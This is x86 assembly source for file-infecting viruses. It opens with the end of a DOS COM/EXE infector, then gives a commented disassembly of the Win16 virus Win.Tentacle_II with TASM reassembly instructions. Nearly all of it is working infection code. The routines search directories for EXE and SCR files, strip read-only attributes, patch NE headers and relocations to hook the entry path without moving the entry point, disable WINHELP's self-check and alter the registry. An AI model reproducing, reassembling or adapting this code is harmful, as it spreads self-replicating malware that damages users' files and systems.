mov ax , 4301h ; reset attributes of victimxor cx , cx ; CX=new attributes=0int 21hjnc get_attributes_okjmp reset_attributes
get_attributes_ok :mov ax , 3D02h ; open file r/wint 21h ; DS:DX=filename ptrjnc openfile_okjmp reset_attributes
openfile_ok :xchg bx , ax ; filehandle to BX
push cs ; DS=ES=CSpush cspop dspop es
mov ax , 5700h ; get file date/timeint 21hpush cx ; save file timepush dx ; save file date
mov ah, 3Fh ; read file headermov dx , ( header - v_start ) ; DS:DX=buffer to read
mov cx , 1Ch ; DOS EXE header sizeint 21h
cmp word ptr cs :[ header - v_start ], "MZ" ; EXE header?jne probably_not_an_exejmp infect_exe
probably_not_an_exe :cmp word ptr cs :[ 2AEh], "ZM" ; EXE header?
jne not_an_exejmp infect_exe
not_an_exe :cmp word ptr cs :[ header - v_start ], - 1 ; SYS file?jne infect_com
jmp restore_filetime
header db 1Ch dup ( 0C3h) ; 0C3h - ret opcode - quit 1st gen
infect_com :mov ax , 4202h ; goto end of filexor cx , cx ; CX:DX=0=distance to movecwdint 21h
cmp dx , 0 ; high word of filesize=0 ?jbe com_size_ok ; if yes, file is too bigjmp restore_filetime ; to infect
com_size_ok :push ax ; save filesizesub ax ,( virus_size +3) ; the theoretical offset of
; the jmp if file was infectedcmp ax ,word ptr cs :[ header - v_start +1] ; equal means
; the file is already infectedpop ax ; restore filesize in AXjne com_not_infected_yet
jmp restore_filetimecom_not_infected_yet :
mov word ptr cs :[ host_type - v_start ], "OC" ; set host typesub ax , 3mov word ptr cs :[ jmp_distance - v_start ], axadd ax , 3 ; completely useless instruction
mov ah, 40h ; write virus bodymov dx , 0 ; virus offset in memorymov cx , virus_size ; CX=size to writeint 21h
mov ax , 4200h ; set filepointer to beginningxor cx , cx ; CX:DX=distance to move=0cwdint 21h
mov ah, 40h ; write new jump to filestartmov dx ,( new_jmp - v_start ) ; DS:DX=ptr to buffer
mov cx , 3 ; write three bytes (near jmp)int 21h
pop dx ; restore old file date in DXpop cx ; restore old file time in CXpush cx ; save CX againand cl , 00011111b ; CL=seconds from filetimemov byte ptr cs :[ seconds - v_start ], cl ; store itpop cx ; restore CXand cl , 11100000b ; clear seconds from filetimeadd cl , 1Dh ; mark as infected with seconds=60jmp set_filetime ; set new filetime
new_jmp :db 0E9h
jmp_distance dw ?
infect_exe :cmp word ptr cs :[ header - v_start +18h ], 40h ; Relo table address
jb no_new_exejmp restore_filetime ; don't take New EXEs
no_new_exe :cmp word ptr cs :[ header - v_start +1Ah], 0 ; Overlay number
je no_overlayjmp restore_filetime ; don't take overlays
no_overlay :cmp word ptr cs :[ header - v_start +12h ], "UC" ; CRC/infection mark
jne not_infected_yetjmp restore_filetime ; don't reinfect
not_infected_yet :mov word ptr cs :[ host_type - v_start ], "XE" ; mark host as EXE
mov ax ,word ptr cs :[ header - v_start +0Eh] ; save SSmov cs :[ host_ss - v_start ], ax
mov ax ,word ptr cs :[ header - v_start +10h ] ; save SPmov cs :[ host_sp - v_start ], axmov ax ,word ptr cs :[ header - v_start +16h ] ; save CS
mov cs :[ host_cs - v_start ], axmov ax ,word ptr cs :[ header - v_start +14h ] ; save IP
mov cs :[ host_ip - v_start ], ax
mov ax , 4202h ; go to end of filexor cx , cx ; DX:CX=new file pointer
cwdint 21h
push bx ; save file handlepush ax ; save filesizepush dx ; save filesize high
mov bx ,word ptr cs :[ header - v_start +08h ] ; header size (paras)shl bx , 4 ; BX=BX*16 : convert to bytessub ax , bx ; DX:AX=image size
sbb dx , 0mov cx , 10h ; divide by 16div cx ; calculate new CS/IP
mov word ptr cs :[ header - v_start +14h ], dx ; IPmov word ptr cs :[ header - v_start +16h ], ax ; CSmov word ptr cs :[ header - v_start +0eh ], ax ; SSmov word ptr cs :[ header - v_start +10h ], 0FFFEh ; SP
mov word ptr cs :[ header - v_start +12h ], "UC" ; CRC/marker
pop dx ; restore filesize to DX:AXpop ax
add ax , virus_size ; calculate new filesizeadc dx , 0
mov cx , 200h ; calculate filesize in 512 byte pagesdiv cxinc ax ; round up pagesmov word ptr cs :[ header - v_start +4], ax ; filesize mod 512mov word ptr cs :[ header - v_start +2], dx ; filesize div 512
pop bx ; restore file handle
mov ah, 40h ; write virus to EOF filemov cx , virus_size ; size to writemov dx , 0 ; virus offset in memory
int 21h
mov ax , 4200h ; go to start of filexor cx , cx ; DX:CX=new position in file=0
cwdint 21h
mov ah, 40h ; write new EXE headermov dx , ( header - v_start ) ; DS:DX=buffer to readmov cx , 1Ch ; DOS EXE header size
int 21h
pop dx ; restore old file date in DXpop cx ; restore old file time in CXpush cx ; save CX againand cl , 00011111b ; CL=seconds from filetimemov byte ptr cs :[ seconds - v_start ], cl ; store itpop cx ; restore CXand cl , 11100000b ; clear seconds from filetimeadd cl , 1Dh ; mark as infected with seconds=60jmp set_filetime ; set new filetime
nop ; single-pass assembler shit
int24h_handler :iret ; Interrupt return
int24h_offset dw ?
int24h_segment dw ?
restore_filetime :pop dx ; restore old file date in DXpop cx ; restore old file time in CX
set_filetime :mov ax , 5701h ; set file time/date
int 21h
mov ah, 3Eh ; close fileint 21h
mov ax , 5700h ; get file time/dateint 21h
reset_attributes :pop cx ; restore old file attributespop ds ; restore pointer to filenamepop dx ; in DS:DXmov ax , 4301h ; set file attributes funct.int 21h
xor ax , ax ; AX=0mov ds , ax ; DS=AX=0=IVT segment
mov ax ,word ptr cs :[ int24h_offset - v_start ] ; BX:AX=ptr32 to oldmov bx ,word ptr cs :[ int24h_segment - v_start ] ; int24h handler
cli ; disable interruptsmov ds :[ 24h* 4], ax ; restore old int24h handlermov ds :[ 24h* 4+2], bxsti ; enable interrupts
pop es ; restore segment registerspop dspopa ; restore all other registersjmp org_int21h
host_type dw "OC" ; first generation is a COMseconds db 0v_end :
end start
comment %
Name : Win.Tentacle_IIAlias : ShellAuthor : ?Type : direct acting Win16 NE appenderSize : 10608 bytes virus body ( because of relocation stuff
infected files increase for at least 10634 bytes )Origin : ?When : 1996Status : was in the wild ( distributed in sex newsgroups in 1996 )Disassembled by : Black JackContact me : [email protected] | http :// www.coderz.net / blackjack
Description :When the virus gets activated , it starts to search and infect NE EXE files ,first one * .EXE file in the current directory , then two in the C: \WINDOWSdirectory , then one in some other possible hardcoded windows directories(C: \WIN , C: \WIN31 , C: \WIN311 , C: \WIN95 ), and then one * .SCR file in thecurrent dir. While infection the virus creates a temporary fileC: \TENTACLE. $$$ and rebuilds there an infected image of the victim file. Whenthe infection process is finished this file is copied back over the victimfile and then deleted.The infection technique is adding another segment with the viruscode at the end of the file. To add its own entry to the segment table , itchecks if there is enough unused room between the end of the NE header tablesand the start of the first segment and aborts infection if not. Then itshifts back all tables after the segment table ( therefore overwriting theunused fill bytes ) and fixes their offsets in the NE header , so that it canwrite its own segment descriptor at the end of the segment table. In a similarway it adds its own entries to the module - reference and the imported - namestable ( this is necessary to import two APIs that are used in the payload ) .The most interesting feature of the virus is that it was one of the first ( ifnot the very first ) viruses using EPO techniques , that means infecting thefile without modifying its entry point. To do so , it searches the code segmentthat contains the entry point for a call to the INITTASK API from KERNEL.DLL ,or , if that one is not found , the THUNRTMAIN API from VBRUN300.DLL , this areAPIs that should be in the very beginning of a program. Then the relocationitem that is associated with the API call is patched in such a way that thiscall is redirected to the virus.While infecting , the virus pays special attention to the WINHELP.EXE files.This file contains a self - check in Win3.11. And that 's why the virus patchesit in a special way , so that this self - check is disabled.The payload is activated if the virus is run between 1: 00am and 1: 05am - Thevirus drops a file C: \TENTACLE.GIF containing a picture of the violet tentaclefrom the classical computer game "the day of the tentacle" and modifies theregistry in such a way that whenever the program associated with .GIF fil esis run to view such a file it displays the file dropped by the vi rus. To do soit uses two imported APIs RegSetValue and RegQueryValue from SHELL.DLL.Additionally , if the virus is executed between 1: 15am and 2: 00am it runs theopposite effect and undoes the changes in the registry that were done in thepayload.
Reassembly tested with Tasm 3.1 and TLink 3.0 .
TASM / M tenta2TLINK tenta2
first generation sample is a DOS EXE file and infects all suitable EXE filesin the current directory only.
%
virus_size EQU ( offset virus_end - offset virus_start )
.model tiny
.code
.386org 0
virus_start :segm_offset dw 0segm_phys_size dw virus_sizesegm_attribs dw 0001110101010000b ; readable code segment with relocssegm_virt_size dw virus_size
reloc_stuff :dd 0000FFFFh ; pointers that will become relocateddd 0000FFFFh ; must be initialised by 0000:FFFFdd 0000FFFFh
; This is the real start of the relocation data:dw 3 ; three relocation items
db 3 ; 32bit far pointerdb 1 ; imported ordinaldw offset RegQueryValue ; offset of relocation item
size_of_reloc_stuff1 EQU ($ - reloc_stuff )dw 0 ; will become module-reference index
reloc_stuff2 dw 6 ; ordinal RegQueryValue
db 3 ; 32bit far pointerdb 1 ; imported ordinaldw offset RegSetValue ; offset of relocation item
size_of_reloc_stuff2 EQU ($ - reloc_stuff2 )dw 0 ; will become module-reference index
reloc_stuff3 dw 5 ; ordinal RegSetValue
db 3 ; 32bit far pointerdb 1 ; imported ordinaldw offset org_entry ; offset of relocation item
size_of_reloc_stuff3 EQU ($ - reloc_stuff3 )dw 0 ; will become module-reference indexdw 0 ; will become ordinal of hooked API
virus_entry :push ds ; save DSpusha ; save all registers
push ss ; DS=SSpop ds
sub sp , size stack_frame ; reserve room on stackmov bp, sp ; setup stack frame
mov ah, 1Ah ; set DTA to DS:DXlea dx ,[ bp.dta ] ; DS:DX=our DTA in our stack frameint 21h
mov bx , 1mov cx , offset empty_stringmov dx , offset exe_wildcardCALL infect_directory ; infect one EXE file in current dir
mov bx , 2mov cx , offset C_windowsmov dx , offset exe_wildcardCALL infect_directory ; infect two EXE files in C:\WINDOWS
mov bx , 1mov cx , offset C_winmov dx , offset exe_wildcardCALL infect_directory ; infect one EXE file in C:\WIN
mov bx , 1mov cx , offset C_win31mov dx , offset exe_wildcardCALL infect_directory ; infect one EXE file in C:\WIN31
mov bx , 1mov cx , offset C_win311mov dx , offset exe_wildcardCALL infect_directory ; infect one EXE file in C:\WIN311
mov bx , 1mov cx , offset C_win95mov dx , offset exe_wildcardCALL infect_directory ; infect one EXE file in C:\WIN95
mov bx , 1mov cx , offset empty_stringmov dx , offset scr_wildcardCALL infect_directory ; infect one SCR in current dir
mov ah, 1Ah ; set DTA to DS:DXmov dx , 7Fh ; DX=80h (standart DTA offset)inc dxpush ds ; save DSpush es ; DS=ES=PSP (or equivalent) segmentpop dsint 21h
pop ds ; restore DS
mov ah, 2Ch ; get the system time to CX/DXint 21h ; CH=hours, CL=minutes, DH=seconds
; DL=1/100 seconds
cmp cx , 100h ; is it before 1:00am ?JB restore_host ; if yes, no payloadcmp cx , 105h ; is it before 1:05am ?JB change_gif_cmdline ; call payload between 1:00 and 1:05cmp cx , 10Fh ; is it before 1:15am ?JB restore_host ; if yes, no payloadcmp cx , 200h ; is it after 2:00am ?JAE restore_host ; if yes, no payloadmov ax , 0 ; restore old gif commandlineJMP call_payload ; call payload between 1:15 and 2:00
change_gif_cmdline :mov ax , 1 ; change gif commandline to our file
call_payload :CALL payload ; play with the gif commandline in
; the win16 "registry".
restore_host :
add sp , size stack_frame ; free room on stack
popa ; restore all registerspop ds ; restore DSJMP cs : org_entry ; jump to the API that was hooked
; for the EPO while infection.
C_win db "C:\WIN\", 0
; The following two subroutines are not used in the whole virus. I guess that; they were just used in the first generation sampl e, and accidentally left; in by the virus author. That's why I also used th em in the first generation; carrier of the disassembly.
encrypt_wildcard :push si ; save SIpush di ; save DIpush es ; save ES
push ds ; ES=DSpop es
mov di , si ; DI=SIxor al , al ; AL=0mov cx , 0FFFFh ; search whole segmentrepne scasb ; search for the end of the stringdec di ; go back to the terminating zeromov ax , di ; AX=end of string
; SI=start of stringsub ax , si ; AX=length of string
pop es ; restore ESpop di ; restore DI
mov cx , ax ; CX=length of string
encrypt_wildcard_loop :inc byte ptr [ si ] ; encrypt one byte from stringinc si ; next byteloop encrypt_wildcard_loop
pop si ; restore SI
RET
encrypt_path :push si ; save SIpush di ; save DIpush es ; save ES
push ds ; ES=DSpop es
mov di , si ; DI=SIxor al , al ; AL=0mov cx , 0FFFFh ; search whole segmentrepne scasb ; search for the end of the stringdec di ; go back to the terminating zeromov ax , di ; AX=end of string
; SI=start of string
sub ax , si ; AX=length of string
pop es ; restore ESpop di ; restore DI
mov cx , ax ; CX=length of string
encrypt_path_loop :dec byte ptr [ si ] ; encrypt one byte from stringinc si ; next byteloop encrypt_path_loop
pop SI ; restore SI
RET
; ----- DECRYPT PATH STRING ----------------------- --------------------------; Entry:; SI - pointer to source buffer; DI - pointer to destination buffer; Exit:; DI - end of destination buffer
decrypt_path :cld ; clear direction flag
push di ; save DIpush es ; save ES
push ds ; ES=DSpop es
mov di , si ; DI=SIxor al , al ; AL=0mov cx , 0FFFFh ; search whole segmentrepne scasb ; search for the end of the stringdec di ; go back to the terminating zeromov ax , di ; AX=end of string
; SI=start of stringsub ax , si ; AX=length of string
pop es ; restore ESpop di ; restore DI
mov cx , ax ; CX=length of stringinc cx ; because the LOOP immedeately followsJMP loop_decrypt_path
decrypt_path_loop :lodsb ; load a byte from source stringinc al ; decrypt itstosb ; store decrypted byte
loop_decrypt_path :loop decrypt_path_loop
movsb ; move terminating zeroRET
; ----- DECRYPT WINDCARD STRING ------------------- --------------------------; Entry:
; SI - pointer to source buffer; DI - pointer to destination buffer; Exit:; DI - end of destination buffer
decrypt_wildcard :cld ; clear direction flag
push di ; save DIpush es ; save ES
push ds ; ES=DSpop es
mov di , si ; DI=SIxor al , al ; AL=0mov cx , 0FFFFh ; search whole segmentrepne scasb ; search for the end of the stringdec di ; go back to the terminating zeromov ax , di ; AX=end of string
; SI=start of stringsub ax , si ; AX=length of string
pop es ; restore ESpop di ; restore DI
mov cx , ax ; CX=length of stringinc cx ; because the LOOP immedeately followsJMP loop_decrypt_wildcard
decrypt_wildcard_loop :lodsb ; load a byte from source stringdec al ; decrypt itstosb ; store decrypted byte
loop_decrypt_wildcard :loop decrypt_wildcard_loop
movsb ; move terminating zeroRET
C_windows db "C:\WINDOWS\"empty_string db 0
; ----- INFECT A DIRECTORY ------------------------ --------------------------;; INPUT:; BX - number of files to infect; CX - ptr to path to infect (encrypted); DX - ptr to file wildcard ("*.EXE" or "*.SCR", al so encrypted)
infect_directory :push ds ; save DSpush es ; save ES
push cs ; DS=CSpop ds
push ss ; ES=SSpop es
mov si , cx ; SI=ptr to path to decrypt
lea di ,[ bp.full_filespec ] ; DI=ptr to where full wildcard will; be stored ("C:\path\*.ext")
push cx ; save CX (pointer to path)CALL decrypt_path ; decrypt the path to full_filespec
dec di ; skip the terminating zero
mov si , dxCALL decrypt_wildcard ; decrypt the wilcard to full_filespec
pop si ; restore ptr to path in SIlea di ,[ bp.full_filename ]CALL decrypt_pathdec di ; skip the terminating zero
pop es ; restore ESpop ds ; restore DS
mov ah, 4Eh ; find first filemov cx , 2 ; normal and hidden fileslea dx ,[ bp.full_filespec ]JMP do_file_search
do_file :push es ; save ESpush di ; save DI
push ss ; ES=SSpop es
cld ; clear direction flaglea si ,[ bp.dta +1Eh] ; SI=ptr to found filename in DTA
; DI points after the path in; full_filename
mov cx , 13 ; 8.3 filename (zero terminated)rep movsb ; copy filename
pop di ; restore DIpop es ; restore ES
test byte ptr [ bp.dta +15h ], 1 ; read only attribute set?JZ not_readonly
push dx ; save DX
mov ax , 3000h ; AX=4301h (set file attributes)add ax , 1301hxor ch , ch ; set high byte of attributes to zeromov cl ,[ bp.dta +15h ] ; CL=low byte of attributes
;* and cx,0FFFEh ; delete re ad-only attributedb 83h , 0E1h, 0FEh ; fixup - byte matchlea dx ,[ bp.full_filename ] ; DS:DX=ptr to filename (with path)int 21h
pop dx ; restore DX
JC findnext ; error? if so, search on
not_readonly :CALL infect_file ; infect the file!JC findnext ; on error while infecting search on!dec bx ; decrement infection counterJZ done_directory ; enough files infected?
findnext :mov ah, 4Fh ; find next file
do_file_search :int 21h ; do the file searchJNC do_file ; if no error happened, process file
done_directory :RET
C_win31 db "C:\WIN31\", 0
exe_wildcard db "*.EXE" , 0scr_wildcard db "*.SCR" , 0
; ----- INFECT THE FILE --------------------------- --------------------------
infect_file :pushad ; save all 32bit registers
mov ax , 3D00h ; open file read-onlylea dx ,[ bp.full_filename ] ; DS:DX=pointer to filename
int 21hJC exit_infect ; exit on errormov bx , ax ; file handle to BXmov [ bp.source_handle ], ax ; save file handle
CALL get_file_date_time_size
mov ah, 3Fh ; read DOS headermov cx , 64 ; DOS header sizelea dx ,[ bp.rw_buffer ] ; Load effective addr
int 21hJC close_file
mov ax ,word ptr [ bp.rw_buffer ] ; AX=exe markerdec ax ; anti-heuristiccmp ax , "ZM" - 1 ; EXE file?JNE close_file ; close if not
;* cmp word ptr [bp.rw_buffer+0Ch],0FFFEh ; maxmem item in DOS; header is infection marker
db 81h , 0BEh, 0A9h, 0, 0FEh, 0FFh ; fixup - byte matchJE close_file ; if equal, file is already infected
;* cmp word ptr [bp.rw_buffer+0Ch],0FFFFh ; maxmem must be standartdb 81h , 0BEh, 0A9h, 0, 0FFh, 0FFh ; fixup - byte matchJNE close_file ; if not, don't infect
mov word ptr [ bp.rw_buffer +0Ch], 0FFFEh ; mark as infectedcmp word ptr [ bp.rw_buffer +18h ], 40h ; new exe file?JB close_file ; if not, then close
; set tmp_filename to "C:\TENTACLE.$$$", 0mov dword ptr [ bp.tmp_filename +6], 0F59E6305hadd dword ptr [ bp.tmp_filename +6], 56A4DE4Fhmov word ptr [ bp.tmp_filename +0], ":C"mov dword ptr [ bp.tmp_filename +10], "$$.E"mov dword ptr [ bp.tmp_filename +2], 0B1704BC2hadd dword ptr [ bp.tmp_filename +2], 9CD5089Ahmov word ptr [ bp.tmp_filename +14], "$"
mov ah, 3Ch ; create temporary filemov cx , 2 ; with hidden attributeslea dx ,[ bp.tmp_filename ] ; DS:DX=ptr to filename
int 21hJC close_file ; exit on errormov [ bp.dest_handle ], ax ; save temp file handle
mov ah, 40h ; write DOS header of temp filemov bx ,[ bp.dest_handle ] ; BX=file handlemov cx , 64 ; CX=length to writelea dx ,[ bp.rw_buffer ] ; DS:DX=address write bufferint 21hJC close_tmp_file
mov ecx ,dword ptr [ bp.rw_buffer +3Ch] ; ECX=new exe header offsetmov [ bp.new_header_offs ], ecx ; store itsub ecx , 64 ; size of dos header (already written)CALL copy_file_block ; copy rest of DOS stubJC close_tmp_file
mov bx ,[ bp.source_handle ] ; BX=handle of victim filemov ah, 3Fh ; read NE headermov cx , 64 ; size of NE headerlea dx ,[ bp.rw_buffer ] ; DX=offset of buffer
int 21hJC close_tmp_file
mov ax ,word ptr [ bp.rw_buffer ] ; AX=new exe markerinc ax ; anti-heuristiccmp ax , "EN" +1 ; NE exe file?JNE close_tmp_file ; if not, then abort infection
mov cl ,byte ptr [ bp.rw_buffer +32h ] ; CL=alignment shiftmov eax , 1 ; EAX=1shl eax , cl ; EAX=alignment unitmov [ bp.alignment_unit ], eax ; save itmov cl ,byte ptr [ bp.rw_buffer +32h ] ; CL=alignment shiftmov eax ,[ bp.file_size ] ; EAX=filesizeshr eax , cl ; EAX=filesize in alignment unitsmov [ bp.new_sect_descr +0], ax ; save it as offset for the new
; segment that is going to be createdmov eax ,[ bp.alignment_unit ] ; EAX=alignment unitdec eax ; set all bits below alignemttest eax ,[ bp.file_size ] ; filesize already aligned?JZ filesize_already_alignedinc word ptr [ bp.new_sect_descr +0] ; if not, round it up
filesize_already_aligned :mov ax , cs : segm_phys_size ; copy physical size of segmentmov [ bp.new_sect_descr +2], axmov ax , cs : segm_attribs ; copy segment attributesmov [ bp.new_sect_descr +4], axmov ax , cs : segm_virt_size ; copy virutal size of segmentmov [ bp.new_sect_descr +6], ax
cmp word ptr [ bp.rw_buffer +22h ], 40h ;is the segment table directly; after the NE header (standart case)?
JNE close_tmp_file ; if not, better not infect the file
CALL EPOJC close_tmp_filemov [ bp.module_ordinal ], eax ; save module index and ordinalmov [ bp.our_reloc_offs ], edx ; save offset of relocation item
xor eax , eax ; EAX=0mov ax ,word ptr [ bp.rw_buffer +22h ] ; EAX=offset of segment
; descriptor table from NE hdradd eax ,[ bp.new_header_offs ] ; EAX=offset of segment descriptor
; table from file start
push eax ; CX:DX=EAXpop dxpop cx
mov ax , 4200h ; go to segment descriptor tableint 21h
mov ah, 3Fh ; read the offset of the first segmentmov cx , 2 ; read a wordlea dx ,[ bp.first_segm_offs ] ; DX=offset read buffer
int 21hJC close_tmp_file
mov ax , 4201h ; move file pointer relative to; current position
mov cx ,- 1 ; CX:DX=-2 (new filepointer position)mov dx ,- 2int 21h ; set the filepointer back to the
; start of the segment tableJC close_tmp_file
xor eax , eax ; EAX=0mov ax ,word ptr [ bp.first_segm_offs ] ; EAX=aligned file offset
; of first segmentmul [ bp.alignment_unit ] ; EAX=file offset of the 1st segmentmov [ bp.first_segm_offs ], eax ; save it
mov ebx ,dword ptr [ bp.rw_buffer +2Ch]; EBX=beginning of the nonresident-name table (rela tive to filestart).; This should be the last table in the NE header.
xor ecx , ecx ; ECX=0mov cx ,word ptr [ bp.rw_buffer +20h ] ; ECX=size of nonresident name
; table in bytesadd ebx , ecx ; EBX=size of NE header + all tablesmov dword ptr [ bp.end_of_NE_hdr ], ebx
sub eax , ebx ; EAX=free room between the end of; the NE header and the first segment
;* cmp eax,10h ; is there enough room left so we can; add our stuff (a segment descriptor,; a module reference and an imported; name) ?
db 66h , 83h , 0F8h, 10h ; fixup - byte matchJL close_tmp_file ; if not, we can't infect the file
mov ax ,word ptr [ bp.rw_buffer +1Ch] ; segment countinc ax ; add another segmentmov word ptr [ bp.rw_buffer +1Ch], ax ; save new segment countmov word ptr [ bp.new_entry_CS ], ax ; new entry segment indexmov word ptr [ bp.new_entry_IP ], offset virus_entry ; set new
; entry IPand byte ptr [ bp.rw_buffer +37h ], 011110111b ; windows flags:
; kill gangload area
; fixup the offsets of the other NE header tables ( all are after the segment
; table and therefore shifted back). It is assumed that all tables are in the; same order in the file as their offsets are store d in the NE header (except; for the entry table, which should be the second l ast).
add word ptr [ bp.rw_buffer +4h], 16 ; entry tableadd word ptr [ bp.rw_buffer +24h ], 8 ; resource tableadd word ptr [ bp.rw_buffer +26h ], 8 ; resident-name tableadd word ptr [ bp.rw_buffer +28h ], 8 ; module-reference tableadd word ptr [ bp.rw_buffer +2Ah], 10 ; imported-name tableadd dword ptr [ bp.rw_buffer +2Ch], 16 ; nonresident-name table
inc word ptr [ bp.rw_buffer +1Eh] ; one more entry in; module-reference table
mov ah, 40h ; write modified NE header to tmp filemov bx ,[ bp.dest_handle ] ; BX=temp file handlemov cx , 64 ; NE header sizelea dx ,[ bp.rw_buffer ] ; DX=write buffer offset
int 21hJC close_tmp_file
xor ecx , ecx ; ECX=0mov cx ,word ptr [ bp.rw_buffer +1Ch] ; EAX=number of segmentsdec cx ; ECX=old number of segmentsshl cx , 3 ; shl 3 means mul 8 (size of a
; segment descriptor); ECX=old size of segm descriptor tbl
CALL copy_file_block ; copy segment descriptor tableJC close_tmp_file
mov ah, 40h ; write our own segment descriptor; to the file
mov cx , 8 ; size of a segment descriptorlea dx ,[ bp.new_sect_descr ] ; DX=offset of write buffer
int 21hJC close_tmp_file
xor ecx , ecx ; ECX=0mov cx ,word ptr [ bp.rw_buffer +2Ah] ; ECX=offset of imported-name
; table from NE headermov ax ,word ptr [ bp.rw_buffer +1Ch] ; entries in segment tabledec ax ; AX=old number of segmentsshl ax , 3 ; multiply with 8 (size of a
; segment descriptor)add ax ,word ptr [ bp.rw_buffer +22h ] ; add offset of segment table
; (from NE header); AX=offset end of segment table; relative to the NE header
sub cx , ax ; CX=length of stuff between the; segment table and the imported-name; table (resource, resident-name and; module-reference tables)
sub cx , 10 ; because the imported-name table; offset has already been increased; by 10 before
CALL copy_file_block ; copy all those tablesJC close_tmp_file
mov ax ,word ptr [ bp.rw_buffer +4] ; offset entry table (from; NE header)
sub ax , 6 ; AX=end of old imported-name table
sub ax ,word ptr [ bp.rw_buffer +2Ah] ; ECX=offset of imported-name
; table from NE headermov word ptr [ bp.tmp_buffer ], ax ; AX=offset into imported-name
; table (the one of the module; name we're going to add)
mov ah, 40h ; append our new entry into the; module reference table, the offset; of the new module name
mov cx , 2 ; write one wordlea dx ,[ bp.tmp_buffer ] ; DS:DX=pointer to write buffer
int 21hJC close_tmp_file
xor ecx , ecx ; ECX=0mov cx ,word ptr [ bp.rw_buffer +4] ; offset entry table (from
; NE header)sub cx , 6 ; CX=end of old imported-name tablesub cx ,word ptr [ bp.rw_buffer +2Ah] ; offset of imported-names
; table from NE headerCALL copy_file_block ; copy imported-name tableJC close_tmp_file
mov ah, 40h ; append our module name to the; imported-name table
mov cx , 6 ; length to writemov word ptr [ bp.tmp_buffer +4], "LL" ; create the stringmov dword ptr [ bp.tmp_buffer ], 6DBBFE87h ; 5, "SHELL"add dword ptr [ bp.tmp_buffer ], 0D78C547Eh ; in tmp_bufferlea dx ,[ bp.tmp_buffer ] ; DS:DX=pointer to write buffer
int 21hJC close_tmp_file
mov cx ,word ptr [ bp.end_of_NE_hdr ] ; end of NE header+all tables; (offset from filestart
sub cx ,word ptr [ bp.rw_buffer +4] ; offset entry table (from; NE header)
add cx ,word ptr [ bp.new_header_offs ] ; BUG! this should be a sub,; no add! but because the; filepointer is set new; immedeately afterwards, this; never causes any problems.
CALL copy_file_block ; copy the rest of the header; (entry and nonresident-name tables)
JC close_tmp_file
mov ax , 4200h ; set filepointer in the destination; (temp) file to the start of the; first segment.
push dword ptr [ bp.first_segm_offs ]pop dx ; CX:DX=first segment offset
pop cxint 21h
JC close_tmp_file
mov ax , 4200h ; set filepointer in the source file; to the start of the first segment
mov bx ,[ bp.source_handle ]push dword ptr [ bp.first_segm_offs ]pop dx ; CX:DX=first segment offset
pop cxint 21h
JC close_tmp_file
mov ecx , 0FFFFFFFFh ; whole file bodyCALL copy_file_block ; copy the file body (all segments
; and relocations)JC close_tmp_file
xor eax , eax ; EAX=0mov ax ,[ bp.new_sect_descr +0] ; EAX=aligned offset of our segmentmov cl ,byte ptr [ bp.rw_buffer +32h ] ; CL=alignment shiftshl eax , cl ; EAX=offset of our segment in bytes
push eax ; CX:DX=EAXpop dxpop cx
mov ax , 4200h ; go to our segment offset in filemov bx ,[ bp.dest_handle ] ; BX=temp file handle
int 21hJC close_tmp_file
mov ah, 40h ; write virus body to filemov cx ,( RegQueryValue - virus_start ) ; write whole virus body
; excluding the three pointers that; must be relocated and therefore; initialised with 0000:FFFF
mov dx , offset virus_start ; DX=offset write buffer=virus bodypush ds ; save DSpush cs ; DS=CS
pop dsint 21h
pop ds ; restore DSJC close_tmp_file
mov ah, 40h ; write relocation stuffmov cx , size_of_reloc_stuff1 ; size of relocation stuffmov dx , offset reloc_stuff ; DX=offset write bufferpush ds ; save DSpush cs ; DS=CS
pop dsint 21h
pop ds ; restore DSJC close_tmp_file
mov ah, 40h ; write module indexmov cx , 2 ; one wordlea dx , ss :[ bp.rw_buffer +1Eh] ; number of entries in module
; reference table - our module; reference is the last
int 21hJC close_tmp_file
mov ah, 40h ; write relocation stuffmov cx , size_of_reloc_stuff2 ; size of relocation stuffmov dx , offset reloc_stuff2 ; DX=offset write bufferpush ds ; save DSpush cs ; DS=CS
pop dsint 21h
pop ds ; restore DSJC close_tmp_file
mov ah, 40h ; write module index
mov cx , 2 ; one wordlea dx , ss :[ bp.rw_buffer +1Eh] ; number of entries in module
; reference table - our module; reference is the last
int 21hJC close_tmp_file
mov ah, 40h ; write relocation stuffmov cx , size_of_reloc_stuff3 ; size of relocation stuffmov dx , offset reloc_stuff3 ; DX=offset write bufferpush ds ; save DSpush cs ; DS=CS
pop dsint 21h
pop dsJC close_tmp_file
mov ah, 40h ; write the reference to the API; we hooked for the EOP
mov cx , 2 ; CX=4 (size to write)shl cx , 1 ; ???lea dx ,[ bp.module_ordinal ] ; DS:DX=pointer to write buffer
int 21hJC close_tmp_file
push [ bp.our_reloc_offs ] ; CX:DX=offset of the relocation itempop dx ; that has to be modifies
pop cxmov ax , 4200h ; set filepointer relative toint 21h ; filestartJC close_tmp_file
mov ah, 40h ; write relocation typemov cx , 2 ; one wordmov word ptr [ bp.tmp_buffer ], 3 ; 32bit far ptr/internal referencelea dx ,[ bp.tmp_buffer ] ; DS:DX=pointer to write buffer
int 21hJC close_tmp_file
mov ax , 4201h ; set new file pointer relative to; current position
mov cx , 0 ; CX:DX=2 (skip the offset of themov dx , 2 ; dword that must be relocated)
int 21hJC close_tmp_file
mov ah, 40h ; write a far pointer to the virus; entrypoint.
mov cx , 2 ; CX=4 (size to write)shl cx , 1 ; ???lea dx ,[ bp.new_entry_CS ] ; DS:DX=pointer to write buffer
int 21hJC close_tmp_file
cmp dword ptr [ bp.dta +24h ], "XE.P" ; check the filename of theJNE not_winhelp ; victim for "WINHELP.EXE" and try tomov eax ,dword ptr [ bp.dta +20h ] ; patch it if the filename matches
add eax , 98F5548Ahcmp eax , "LEHN" +98F5548AhJNE not_winhelpcmp word ptr [ bp.dta +28h ], "E"JNE not_winhelp
cmp word ptr [ bp.dta +1Eh], "IW"JNE not_winhelpCALL patch_winhelp
not_winhelp :
mov ah, 3Eh ; close temp fileint 21h
mov bx ,[ bp.source_handle ] ; BX=victim file handlemov ah, 3Eh ; close victim file
int 21h
lea dx ,[ bp.tmp_filename ] ; DS:DX=pointer to temp file namemov ax , 3D00h ; reopen temp file read-only
int 21h
JC delete_tmp_filemov [ bp.source_handle ], ax ; save handle
mov ah, 3Ch ; truncate victim filemov cx , 0 ; no attributeslea dx ,[ bp.full_filename ] ; DS:DX=ptr to full victim filename
int 21hJC delete_tmp_file
mov bx , ax ; handle to BXmov [ bp.dest_handle ], ax ; save handle
mov ecx , 0FFFFFFFFh ; copy the whole temp file over theCALL copy_file_block ; victim file
